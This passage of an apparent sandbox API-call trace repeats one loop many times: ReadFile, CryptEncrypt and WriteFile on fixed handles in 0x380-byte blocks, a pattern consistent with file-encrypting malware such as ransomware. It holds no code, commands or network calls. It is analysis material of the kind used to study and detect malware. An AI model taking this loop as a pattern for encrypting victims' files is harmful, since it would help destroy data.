returned 1 [0280.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.644] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.644] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.644] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.644] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.644] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.644] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.644] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.644] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.644] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.645] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.645] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.645] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.645] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.645] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.645] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.645] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.645] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.645] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.646] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.646] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.646] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.646] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.646] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.646] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.646] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.646] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.646] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.647] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.647] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.647] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.649] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.649] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.649] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.649] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.649] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.649] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.649] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.649] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.649] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.650] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.650] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.650] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.650] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.650] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.650] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.658] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.658] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.658] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.658] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.659] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.659] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.659] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.659] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.659] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.660] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.660] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.660] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.660] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.661] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.661] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.661] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.661] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.661] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.661] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.662] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.662] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.692] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.692] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.692] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.692] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.693] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.693] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.693] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.693] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.693] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.693] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.693] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.693] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.693] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.694] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.694] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.694] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.695] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.695] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.696] ReadFile (in: 